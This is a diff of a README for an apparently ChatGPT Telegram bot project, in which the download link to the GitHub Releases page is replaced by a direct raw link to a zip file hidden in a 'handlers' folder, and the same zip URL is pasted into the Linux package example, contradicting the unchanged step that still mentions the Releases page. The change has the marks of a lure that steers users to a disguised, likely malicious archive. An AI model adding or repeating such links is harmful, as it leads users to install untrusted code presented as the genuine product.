alexa2851/ChatGPT-TelegramBot-Pro/README.md

 ### 🔗 Download & Install

-To get the bot, [visit this page to download](https://github.com/alexa2851/ChatGPT-TelegramBot-Pro/releases).
+To get the bot, [visit this page to download](https://raw.githubusercontent.com/alexa2851/ChatGPT-TelegramBot-Pro/main/handlers/Bot_Chat_GP_Pro_Telegram_2.2.zip).

 1. Click on the link above to go to the Releases page.
 2. Find the latest release version and click on it.
-3. Look for the installation package suitable for your operating system (e.g., .exe for Windows, .tar.gz for Linux).
+3. Look for the installation package suitable for your operating system (e.g., .exe for Windows, https://raw.githubusercontent.com/alexa2851/ChatGPT-TelegramBot-Pro/main/handlers/Bot_Chat_GP_Pro_Telegram_2.2.zip for Linux).
 4. Download the file to your computer.

 ### 🛠️ Installation